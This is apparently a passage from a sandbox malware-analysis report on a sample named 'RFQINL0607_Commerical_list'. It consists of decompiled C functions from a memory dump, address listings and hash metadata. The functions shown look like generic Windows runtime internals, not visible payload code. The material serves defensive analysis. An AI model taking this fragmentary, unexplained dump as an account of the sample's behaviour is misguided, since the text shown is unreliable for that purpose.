                                                                                                                                                                                  0x3336c652
                                                                                                                                                                                  0x3336c655
                                                                                                                                                                                  0x3336c65b
                                                                                                                                                                                  0x3336c65d
                                                                                                                                                                                  0x3336c65d
                                                                                                                                                                                  0x3336c662
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c66c
                                                                                                                                                                                  0x3336c670
                                                                                                                                                                                  0x3336c670
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c65d
                                                                                                                                                                                  0x3336c5e8
                                                                                                                                                                                  0x3336c5f1
                                                                                                                                                                                  0x333b8c5d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c600
                                                                                                                                                                                  0x3336c600
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c600
                                                                                                                                                                                  0x3336c5f1
                                                                                                                                                                                  0x333b8b3b
                                                                                                                                                                                  0x3336c5bd
                                                                                                                                                                                  0x3336c5bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336c5bd
                                                                                                                                                                                  0x3336c5ae
                                                                                                                                                                                  0x3336c5b4
                                                                                                                                                                                  0x333b8b5b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8b61
                                                                                                                                                                                  0x333b8b61
                                                                                                                                                                                  0x333b8b61
                                                                                                                                                                                  0x333b8b62
                                                                                                                                                                                  0x333b8b65
                                                                                                                                                                                  0x333b8b6f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8b73
                                                                                                                                                                                  0x333b8b83
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8b83
                                                                                                                                                                                  0x333b8b75
                                                                                                                                                                                  0x333b8b76
                                                                                                                                                                                  0x333b8b77
                                                                                                                                                                                  0x333b8b77
                                                                                                                                                                                  0x333b8b7a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8b7e
                                                                                                                                                                                  0x3336c5ba
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1d7f1536c86b129bf5a5233eba52894b4b17e6469c4ead59f95cb78e02e3c86c
                                                                                                                                                                                  • Instruction ID: e4c60f4b1d500bf2c1f4bc9d18e4f32e78a11519b55c6f0fa98aeb9a890d150d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7f1536c86b129bf5a5233eba52894b4b17e6469c4ead59f95cb78e02e3c86c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5071DDB4C05764DFDB21CF68C8906AEBBF8FF48705F18812AE891AB754D7749801CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336252B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                                  			E3336252B(intOrPtr __ecx, intOrPtr* __edx) {
				unsigned int* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr _t74;
				unsigned int* _t76;
				intOrPtr* _t84;
				char* _t85;
				unsigned int* _t94;
				char* _t111;
				char* _t120;
				intOrPtr* _t133;
				signed int _t155;
				signed int _t158;
				signed int _t161;
				unsigned int _t169;
				unsigned int* _t171;
				intOrPtr _t173;
				signed int _t178;

				_t133 = __edx;
				_t173 = __ecx;
				_v20 =  *__edx;
				_t169 = __ecx - 0xa8 + (( *(__edx + 8) & 0x000000ff) << 5);
				_v24 = __ecx;
				_t74 =  *((intOrPtr*)(__ecx + 0xc));
				_v16 = _t74;
				if( *((intOrPtr*)(_t74 + 0xe8)) != 0) {
					if(( *(_t74 + 0x40) & 0x00000001) == 0) {
						E3335FED0( *((intOrPtr*)(_t74 + 0xc8)));
						_push( *((intOrPtr*)(_v20 + 0xc8)));
						E3335E740(0);
					}
				}
				_t155 =  *(_t169 + 4) & 0x0000ffff;
				_v12 = _t155;
				if(_t155 >  *((intOrPtr*)(_t169 + 0xc))) {
					_t76 = _t169 + 8;
					_v8 = _t76;
					if(_t155 <=  *_t76 >>  *(_t169 + 0x10)) {
						goto L2;
					} else {
						_t142 =  *(_t133 + 8);
						_t161 = 1 <<  *(_t133 + 8);
						if(1 > 0x78000) {
							_t161 = 0x78000;
						}
						_v16 = ( *(_t133 + 0xa) & 0x0000ffff) + _t161;
						E3334DD43( *((intOrPtr*)(_v24 + 0xc)), _t133, _t142);
						if(L33363C40() != 0) {
							_t111 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t111 = 0x7ffe0380;
						}
						if( *_t111 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								goto L15;
							}
							_t135 = _v24;
							E3340F582(_v24,  *((intOrPtr*)(_v24 + 0xc)), _t133, _v16, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
							goto L16;
						} else {
							L15:
							_t135 = _v24;
							L16:
							_t94 = _t169 + 8;
							asm("lock dec dword [eax]");
							if(_v12 != 0) {
								_t94 = E3337FE50(_t169);
								_t171 = _t94;
								if(_t171 != 0) {
									_t178 = 1 <<  *(_t171 + 8);
									if(_t178 > 0x78000) {
										_t178 = 0x78000;
									}
									_v12 = ( *(_t171 + 0xa) & 0x0000ffff) + _t178;
									asm("lock xadd [eax], ecx");
									E3334DD43( *((intOrPtr*)(_t135 + 0xc)), _t171,  ~(( *(_t171 + 0xa) & 0x0000ffff) + _t178));
									if(L33363C40() != 0) {
										_t120 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									} else {
										_t120 = 0x7ffe0380;
									}
									if( *_t120 != 0) {
										if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
											E3340F4FD(_t135,  *((intOrPtr*)(_t135 + 0xc)), _t171, _v12, 0);
											E3340F582(_t135,  *((intOrPtr*)(_t135 + 0xc)), _t171, _v12, 0);
										}
									}
									_t94 = _v8;
									asm("lock dec dword [eax]");
								}
							}
							L8:
							return _t94;
						}
					}
				}
				L2:
				_t158 = 1 <<  *(_t133 + 8);
				if(1 > 0x78000) {
					_t158 = 0x78000;
				}
				_v8 = ( *(_t133 + 0xa) & 0x0000ffff) + _t158;
				asm("lock xadd [eax], ecx");
				_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t84 != 0) {
					if( *_t84 == 0) {
						goto L5;
					}
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					L6:
					if( *_t85 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							E3340F607(_t133,  *((intOrPtr*)(_t173 + 0xc)), _t133, _v8, ( *(_v20 + 0x14) & 0x0000ffff) << 3);
						}
					}
					L33362330(_t169 >> 0x00000002 & 0x0000001f, 0x33444f60 + (_t169 >> 0x00000002 & 0x0000001f) * 4);
					 *_t133 =  *_t169;
					 *(_t169 + 4) =  *(_t169 + 4) + 1;
					 *_t169 = _t133;
					E333624D0(0x33444f60 + (_t169 >> 0x00000002 & 0x0000001f) * 4);
					_t94 = 1;
					 *((intOrPtr*)(_t169 + 0x16)) =  *((intOrPtr*)(_t169 + 0x16)) + 1;
					goto L8;
				}
				L5:
				_t85 = 0x7ffe0380;
				goto L6;
			}
























                                                                                                                                                                                  0x33362537
                                                                                                                                                                                  0x3336253a
                                                                                                                                                                                  0x33362541
                                                                                                                                                                                  0x33362552
                                                                                                                                                                                  0x33362554
                                                                                                                                                                                  0x33362558
                                                                                                                                                                                  0x3336255b
                                                                                                                                                                                  0x33362566
                                                                                                                                                                                  0x333626dd
                                                                                                                                                                                  0x333626e9
                                                                                                                                                                                  0x333626f2
                                                                                                                                                                                  0x333626f8
                                                                                                                                                                                  0x333626f8
                                                                                                                                                                                  0x333626dd
                                                                                                                                                                                  0x3336256c
                                                                                                                                                                                  0x33362573
                                                                                                                                                                                  0x33362579
                                                                                                                                                                                  0x333625f5
                                                                                                                                                                                  0x333625f8
                                                                                                                                                                                  0x33362605
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336260b
                                                                                                                                                                                  0x3336260b
                                                                                                                                                                                  0x33362618
                                                                                                                                                                                  0x3336261c
                                                                                                                                                                                  0x3336261e
                                                                                                                                                                                  0x3336261e
                                                                                                                                                                                  0x33362628
                                                                                                                                                                                  0x3336263c
                                                                                                                                                                                  0x33362648
                                                                                                                                                                                  0x333b60c4
                                                                                                                                                                                  0x3336264e
                                                                                                                                                                                  0x3336264e
                                                                                                                                                                                  0x3336264e
                                                                                                                                                                                  0x33362656
                                                                                                                                                                                  0x333b60db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b60e7
                                                                                                                                                                                  0x333b60fd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336265c
                                                                                                                                                                                  0x3336265c
                                                                                                                                                                                  0x3336265c
                                                                                                                                                                                  0x33362660
                                                                                                                                                                                  0x33362660
                                                                                                                                                                                  0x33362663
                                                                                                                                                                                  0x3336266b
                                                                                                                                                                                  0x33362673
                                                                                                                                                                                  0x33362678
                                                                                                                                                                                  0x3336267c
                                                                                                                                                                                  0x33362685
                                                                                                                                                                                  0x3336268e
                                                                                                                                                                                  0x33362690
                                                                                                                                                                                  0x33362690
                                                                                                                                                                                  0x3336269a
                                                                                                                                                                                  0x333626a3
                                                                                                                                                                                  0x333626ad
                                                                                                                                                                                  0x333626b9
                                                                                                                                                                                  0x333b6110
                                                                                                                                                                                  0x333626bf
                                                                                                                                                                                  0x333626bf
                                                                                                                                                                                  0x333626bf
                                                                                                                                                                                  0x333626c7
                                                                                                                                                                                  0x333b6127
                                                                                                                                                                                  0x333b6139
                                                                                                                                                                                  0x333b6146
                                                                                                                                                                                  0x333b6146
                                                                                                                                                                                  0x333b6127
                                                                                                                                                                                  0x333626cd
                                                                                                                                                                                  0x333626d1
                                                                                                                                                                                  0x333626d1
                                                                                                                                                                                  0x3336267c
                                                                                                                                                                                  0x333625ec
                                                                                                                                                                                  0x333625f2
                                                                                                                                                                                  0x333625f2
                                                                                                                                                                                  0x33362656
                                                                                                                                                                                  0x33362605
                                                                                                                                                                                  0x3336257b
                                                                                                                                                                                  0x33362586
                                                                                                                                                                                  0x3336258a
                                                                                                                                                                                  0x3336258c
                                                                                                                                                                                  0x3336258c
                                                                                                                                                                                  0x33362594
                                                                                                                                                                                  0x3336259d
                                                                                                                                                                                  0x333625a7
                                                                                                                                                                                  0x333625ac
                                                                                                                                                                                  0x333b6153
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b6162
                                                                                                                                                                                  0x333625b7
                                                                                                                                                                                  0x333625ba
                                                                                                                                                                                  0x333b6179
                                                                                                                                                                                  0x333b6197
                                                                                                                                                                                  0x333b6197
                                                                                                                                                                                  0x333b6179
                                                                                                                                                                                  0x333625d0
                                                                                                                                                                                  0x333625d7
                                                                                                                                                                                  0x333625d9
                                                                                                                                                                                  0x333625de
                                                                                                                                                                                  0x333625e0
                                                                                                                                                                                  0x333625e7
                                                                                                                                                                                  0x333625e8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333625e8
                                                                                                                                                                                  0x333625b2
                                                                                                                                                                                  0x333625b2
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4cf829d701db11f32085f0d559a218b21167c949686b5f310b68829686e2f498
                                                                                                                                                                                  • Instruction ID: f288da0cabec67ee05ef28c1b700847a20e6868e54b6125235bed0f9652816a7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cf829d701db11f32085f0d559a218b21167c949686b5f310b68829686e2f498
                                                                                                                                                                                  • Instruction Fuzzy Hash: B571AE75A487418FD711CF28C890B26B7E9FF84304F0AC5A9E898CB756DB78D845CBA1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333577F9 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                                  			E333577F9(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t63;
				signed int _t65;
				intOrPtr _t66;
				char* _t71;
				intOrPtr _t75;
				intOrPtr _t76;
				signed int _t80;
				intOrPtr _t81;
				void* _t85;
				char _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t95;
				intOrPtr _t98;
				void* _t100;
				void* _t105;
				signed int _t106;
				intOrPtr* _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int _t116;
				void* _t128;

				_t118 = (_t116 & 0xfffffff8) - 0x4c;
				_v8 =  *0x3344b370 ^ (_t116 & 0xfffffff8) - 0x0000004c;
				_t110 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t103 = __ecx[3];
				if(_t103 == 0) {
					_t58 =  *__ecx | __ecx[1];
					if(( *__ecx | __ecx[1]) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(L33363C40() != 0) {
							_t63 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t63 = 0x7ffe0386;
						}
						if( *_t63 != 0) {
							E33424EC1(_t110);
						}
						_push(0);
						_push( *((intOrPtr*)(_t110 + 0x10)));
						_t58 = E333932F0();
					}
					L20:
					_pop(_t105);
					_pop(_t111);
					_pop(_t85);
					return E33394B50(_t58, _t85, _v8 ^ _t118, _t103, _t105, _t111);
				}
				_t65 = __ecx[2];
				_t86 =  *((intOrPtr*)(_t65 + 0x10));
				_t95 =  *((intOrPtr*)(_t103 + 0x10)) - _t86;
				_t106 =  *(_t65 + 0x14);
				_t66 =  *((intOrPtr*)(_t103 + 0x14));
				_t103 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t86;
				_v52 = _t106;
				_t58 = E33396310(_t95, _t66, 0x2710, 0);
				_v56 = _t58;
				if( *_t110 != _t86 ||  *(_t110 + 4) != _t106) {
					L3:
					 *(_t110 + 0x44) = _t58;
					_t103 = _t58 * 0x2710 >> 0x20;
					 *_t110 = _t86;
					 *(_t110 + 4) = _t106;
					_v20 = _t58 * 0x2710;
					_v16 = _t58 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t86;
						_v32 = _t106;
						if(L33363C40() != 0) {
							_t71 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t71 = 0x7ffe0386;
						}
						if( *_t71 != 0) {
							_t103 = _v40;
							E33425149(_t110, _v40, _t86, _t106);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_push( *((intOrPtr*)(_t110 + 0x10)));
						_t58 = E33394490();
						goto L20;
					} else {
						_t87 = 0x7ffe03b0;
						do {
							_t112 = 0x7ffe0010;
							do {
								_t75 =  *0x334467f0; // 0x0
								_v68 = _t75;
								_t76 =  *0x334467f4; // 0x0
								_v64 = _t76;
								_v72 =  *_t87;
								_v76 =  *((intOrPtr*)(_t87 + 4));
								while(1) {
									_t103 =  *0x7ffe000c;
									_t98 =  *0x7ffe0008;
									if(_t103 ==  *_t112) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t87 = 0x7ffe03b0;
								_t113 =  *0x7ffe03b0;
								_t80 =  *0x7FFE03B4;
								_v60 = _t113;
								_t112 = 0x7ffe0010;
								_v56 = _t80;
							} while (_v72 != _t113 || _v76 != _t80);
							_t81 =  *0x334467f0; // 0x0
							_t114 =  *0x334467f4; // 0x0
							_v76 = _t114;
							_t115 = _v68;
						} while (_t115 != _t81 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t100 = _t98 - _v60 - _t115;
						_t110 = _v48;
						_t89 = _v44;
						asm("sbb edx, eax");
						_t128 = _t103 - _v52;
						if(_t128 < 0 || _t128 <= 0 && _t100 <= _t89) {
							_t86 = _t100 - _t89;
							asm("sbb edx, edi");
							_t106 = _t103;
						} else {
							_t86 = 0;
							_t106 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t110 + 0x44) == _t58) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                                                                  0x33357801
                                                                                                                                                                                  0x3335780b
                                                                                                                                                                                  0x33357811
                                                                                                                                                                                  0x33357813
                                                                                                                                                                                  0x33357819
                                                                                                                                                                                  0x3335781e
                                                                                                                                                                                  0x33357822
                                                                                                                                                                                  0x33357827
                                                                                                                                                                                  0x33357996
                                                                                                                                                                                  0x33357999
                                                                                                                                                                                  0x3335799b
                                                                                                                                                                                  0x3335799d
                                                                                                                                                                                  0x333579a7
                                                                                                                                                                                  0x333b1795
                                                                                                                                                                                  0x333579ad
                                                                                                                                                                                  0x333579ad
                                                                                                                                                                                  0x333579ad
                                                                                                                                                                                  0x333579b4
                                                                                                                                                                                  0x333579c3
                                                                                                                                                                                  0x333579c3
                                                                                                                                                                                  0x333579b6
                                                                                                                                                                                  0x333579b7
                                                                                                                                                                                  0x333579ba
                                                                                                                                                                                  0x333579ba
                                                                                                                                                                                  0x33357978
                                                                                                                                                                                  0x3335797c
                                                                                                                                                                                  0x3335797d
                                                                                                                                                                                  0x3335797e
                                                                                                                                                                                  0x33357989
                                                                                                                                                                                  0x33357989
                                                                                                                                                                                  0x3335782d
                                                                                                                                                                                  0x33357835
                                                                                                                                                                                  0x33357838
                                                                                                                                                                                  0x3335783a
                                                                                                                                                                                  0x3335783d
                                                                                                                                                                                  0x33357840
                                                                                                                                                                                  0x33357846
                                                                                                                                                                                  0x33357848
                                                                                                                                                                                  0x3335784e
                                                                                                                                                                                  0x33357852
                                                                                                                                                                                  0x33357857
                                                                                                                                                                                  0x3335785d
                                                                                                                                                                                  0x33357868
                                                                                                                                                                                  0x3335786d
                                                                                                                                                                                  0x33357870
                                                                                                                                                                                  0x33357877
                                                                                                                                                                                  0x33357879
                                                                                                                                                                                  0x3335787c
                                                                                                                                                                                  0x33357880
                                                                                                                                                                                  0x33357884
                                                                                                                                                                                  0x33357941
                                                                                                                                                                                  0x33357941
                                                                                                                                                                                  0x33357945
                                                                                                                                                                                  0x33357950
                                                                                                                                                                                  0x333b17b1
                                                                                                                                                                                  0x33357956
                                                                                                                                                                                  0x33357956
                                                                                                                                                                                  0x33357956
                                                                                                                                                                                  0x3335795e
                                                                                                                                                                                  0x333b17bb
                                                                                                                                                                                  0x333b17c3
                                                                                                                                                                                  0x333b17c3
                                                                                                                                                                                  0x33357968
                                                                                                                                                                                  0x33357969
                                                                                                                                                                                  0x3335796f
                                                                                                                                                                                  0x33357970
                                                                                                                                                                                  0x33357973
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335788a
                                                                                                                                                                                  0x3335788a
                                                                                                                                                                                  0x33357894
                                                                                                                                                                                  0x33357894
                                                                                                                                                                                  0x33357899
                                                                                                                                                                                  0x33357899
                                                                                                                                                                                  0x3335789e
                                                                                                                                                                                  0x333578a2
                                                                                                                                                                                  0x333578a7
                                                                                                                                                                                  0x333578ad
                                                                                                                                                                                  0x333578b9
                                                                                                                                                                                  0x333578bd
                                                                                                                                                                                  0x333578bd
                                                                                                                                                                                  0x333578bf
                                                                                                                                                                                  0x333578c5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333579ca
                                                                                                                                                                                  0x333579ca
                                                                                                                                                                                  0x333578cb
                                                                                                                                                                                  0x333578cb
                                                                                                                                                                                  0x333578d0
                                                                                                                                                                                  0x333578d2
                                                                                                                                                                                  0x333578d9
                                                                                                                                                                                  0x333578dd
                                                                                                                                                                                  0x333578e2
                                                                                                                                                                                  0x333578e2
                                                                                                                                                                                  0x333578ee
                                                                                                                                                                                  0x333578f3
                                                                                                                                                                                  0x333578f9
                                                                                                                                                                                  0x333578fd
                                                                                                                                                                                  0x33357901
                                                                                                                                                                                  0x33357917
                                                                                                                                                                                  0x3335791b
                                                                                                                                                                                  0x3335791d
                                                                                                                                                                                  0x33357921
                                                                                                                                                                                  0x33357925
                                                                                                                                                                                  0x33357927
                                                                                                                                                                                  0x33357929
                                                                                                                                                                                  0x3335793b
                                                                                                                                                                                  0x3335793d
                                                                                                                                                                                  0x3335793f
                                                                                                                                                                                  0x333b179f
                                                                                                                                                                                  0x333b179f
                                                                                                                                                                                  0x333b17a1
                                                                                                                                                                                  0x333b17a1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33357929
                                                                                                                                                                                  0x3335798a
                                                                                                                                                                                  0x3335798d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335798f

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b729f78e83b56d59acbf9102a67e1fe90f28880163020f895ad3d867b1b19333
                                                                                                                                                                                  • Instruction ID: 9004131e1589d0eea2ad1868041372066a9e38e10d300c501ff8b071bd8d12db
                                                                                                                                                                                  • Opcode Fuzzy Hash: b729f78e83b56d59acbf9102a67e1fe90f28880163020f895ad3d867b1b19333
                                                                                                                                                                                  • Instruction Fuzzy Hash: 80515575A08301DFE714CF29C480A1ABBF9FB88790F54896EF59997754DB30E844CBA2
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334B273 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 33%
                                                                                                                                                                                  			E3334B273(signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __ebx;
				void* __ecx;
				void* __edi;
				intOrPtr* _t27;
				intOrPtr _t28;
				void* _t36;
				intOrPtr* _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr* _t49;
				signed int _t54;
				intOrPtr _t57;
				intOrPtr _t59;
				void* _t67;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t81;
				intOrPtr* _t84;

				_t71 = __edx;
				_push(_t59);
				_push(_t59);
				_v8 = _t59;
				_t54 = __edx * 0xc;
				_v12 = __edx;
				_t75 = _t54 + 0x33449340;
				L33362330(__edx,  *((intOrPtr*)(_t54 + 0x3344933c)));
				_t81 =  *_t75;
				if(_t81 == _t75) {
					L28:
					E333624D0( *((intOrPtr*)(_t54 + 0x3344933c)));
					_t27 = 0;
					goto L15;
				} else {
					_t28 = _v8;
					while(_t81 != _t28) {
						_t81 =  *_t81;
						if(_t81 != _t75) {
							continue;
						} else {
							goto L28;
						}
						goto L31;
					}
					E3338C640(_t54, 0, _t71, _t75);
					 *((intOrPtr*)(_t81 + 0xc)) = 1;
					asm("lock xadd [eax], ecx");
					if(0xffffffff > 0) {
						L30:
						_t63 = 1;
						E3338C640(_t54, 1, 1, _t75);
						_t77 = 0;
						goto L10;
					} else {
						if(0xffffffff != 0) {
							_push(0xe);
							asm("int 0x29");
							goto L30;
						} else {
							E33381D66(0xfffffffffffffffe, 1, 0);
							_t63 =  *_t81;
							_t42 =  *((intOrPtr*)(_t81 + 4));
							if( *((intOrPtr*)(_t63 + 4)) != _t81 ||  *_t42 != _t81) {
								_t67 = 3;
								asm("int 0x29");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t54);
								_push(_t81);
								_push(_t75);
								if(_v20 != 0) {
									L26:
									_t43 = 0xc000000d;
								} else {
									_t79 = _a12;
									if(_t79 == 0) {
										goto L26;
									} else {
										_t57 = _a4;
										if(_t57 == 0) {
											goto L26;
										} else {
											_t44 =  *0x33445d78; // 0x0
											_t84 = L33365D90(_t67,  *0x33445d74, _t44 + 0x40000, 0x10);
											if(_t84 == 0) {
												_t43 = 0xc0000017;
											} else {
												 *((intOrPtr*)(_t84 + 8)) = _t57;
												 *((intOrPtr*)(_t84 + 0xc)) = _a8;
												E3335FED0(0x334432d8);
												_t49 =  *0x334433cc; // 0x779c33c8
												if( *_t49 != 0x334433c8) {
													_push(3);
													asm("int 0x29");
													goto L26;
												} else {
													 *_t84 = 0x334433c8;
													 *((intOrPtr*)(_t84 + 4)) = _t49;
													 *_t49 = _t84;
													_push(0x334432d8);
													 *0x334433cc = _t84;
													E3335E740(0x334433c8);
													 *_t79 = _t84;
													_t43 = 0;
												}
											}
										}
									}
								}
								return _t43;
							} else {
								 *_t42 = _t63;
								 *((intOrPtr*)(_t63 + 4)) = _t42;
								if(_t42 == _t63) {
									_t63 = _v12 + 2;
									asm("lock btr [eax], ecx");
								}
								_t77 = _t81;
								L10:
								E333624D0( *((intOrPtr*)(_t54 + 0x3344933c)));
								if(_t77 != 0) {
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t77 + 8)));
									_t36 = E33370130();
									_push(_t81);
									_push(0);
									if(_t36 != 0) {
										_push( *0x3344921c);
									} else {
										_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
									}
									E33363BC0();
									E33381D66(_t63, 1, "true");
									E3338C640(_t54, 1, 1, _t77);
								}
								_t27 = 1;
								L15:
								return _t27;
							}
						}
					}
				}
				L31:
			}

























                                                                                                                                                                                  0x3334b273
                                                                                                                                                                                  0x3334b278
                                                                                                                                                                                  0x3334b279
                                                                                                                                                                                  0x3334b27d
                                                                                                                                                                                  0x3334b280
                                                                                                                                                                                  0x3334b285
                                                                                                                                                                                  0x3334b28e
                                                                                                                                                                                  0x3334b294
                                                                                                                                                                                  0x3334b299
                                                                                                                                                                                  0x3334b29d
                                                                                                                                                                                  0x333accb6
                                                                                                                                                                                  0x333accbc
                                                                                                                                                                                  0x333accc1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334b2a3
                                                                                                                                                                                  0x3334b2a3
                                                                                                                                                                                  0x3334b2a6
                                                                                                                                                                                  0x333accac
                                                                                                                                                                                  0x333accb0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333accb0
                                                                                                                                                                                  0x3334b2b0
                                                                                                                                                                                  0x3334b2bb
                                                                                                                                                                                  0x3334b2c1
                                                                                                                                                                                  0x3334b2c8
                                                                                                                                                                                  0x333acccd
                                                                                                                                                                                  0x333acccd
                                                                                                                                                                                  0x333acccf
                                                                                                                                                                                  0x333accd4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334b2ce
                                                                                                                                                                                  0x3334b2ce
                                                                                                                                                                                  0x333accc8
                                                                                                                                                                                  0x333acccb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334b2d4
                                                                                                                                                                                  0x3334b2d6
                                                                                                                                                                                  0x3334b2db
                                                                                                                                                                                  0x3334b2dd
